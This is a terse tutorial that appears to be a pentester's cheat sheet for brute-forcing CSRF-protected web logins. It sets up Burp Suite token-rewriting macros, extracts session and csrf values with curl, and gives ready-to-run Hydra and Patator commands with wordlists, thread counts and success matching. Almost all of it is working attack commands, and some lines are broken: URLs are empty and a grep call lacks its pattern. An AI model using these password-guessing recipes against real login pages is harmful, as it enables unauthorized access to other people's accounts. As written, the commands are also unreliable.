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Tutorial - Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
# @author intrd - (thx to g0tmi1k)
# @license Creative Commons Attribution-ShareAlike 4.0 International License -
## Burp csrf-rewritting macro
- Session handling rules = new macro, tick Tolerate URL mismatch when matching parameters..
Create a macro rule over method GET, extract custom parameter w/ parameter name = _csrf
and extract start after expression value=" and end at delimiter ", configure scope for domain and enable for Proxy,
Open session tracker to test. (on Intruder bruteforce, u need to untick Make unmodified baseline request).
- Proxy options = Enable Cookie jar for proxy, if not working, enable invisible proxing
and/or create Match and replace rule for Request header: GET / HTTP/1.0, Regex match.
## (shellscript to gen cookie and extract csrf)
CSRF=$(curl -s -c dvwa.cookie "" | awk -F 'value=' '/_csrf/ {print $2}' | cut -d '"' -f2)
SESSIONID=$(grep xxxhost.cookie | awk -F ' ' '{print $7}')
CSRF=$(echo $CSRF | xargs) #xargs to remove trailing spaces
echo $CSRF
## THC-Hydra
$ rm -f hydra.restore #if u need reset the hydra session every run
$ export HYDRA_PROXY_HTTP= #socks5:// socks4:// connect:// #to enable hydra->burp proxying
hydra -L ~/xxxhost/users.txt -P ~/passwords/common-passwords.txt \
-o logoutput.txt -e ns -F -u -t 1 -w 10 -V http-post-form \
"/:_token=anycsrftoberewrited&_action=login&_url=&_username=^PASS^&_passwd=^PASS^ PHPSESSION=${SESSIONID}" 2>&1 | tee -a logoutput.txt
## Patator (already fetching the csrf-rewrite, disable burpsuite csrf-rewritting macro, BS proxying is enabled for debugging)
$ patator http_fuzz http_proxy="" url="" \
method=POST body='_token=_CSRF_&_task=login&_action=login&_url=&' 0=~/dics/common_int.txt \
follow=0 accept_cookie=1 --threads=7 before_urls="" \
header="Cookie: session1=${SESSIONID}" before_egrep='_CSRF_:name="_csrf" value="(\w+)" />' \
-x quit:fgrep!='div id="loginform"' -x retry:fgrep="Server error" -l data --max-retries=5
## patator http_fuzz url="http://xxxx:xxxx/verificarLogin?ajax=true" \
method=POST body='' 0=~/dic.txt \
follow=0 accept_cookie=1 --threads=45 \
-x quit:fgrep!="Disallowed Key Characters.",fgrep!='esult":false' -l data --max-retries=5 --start=0 -d
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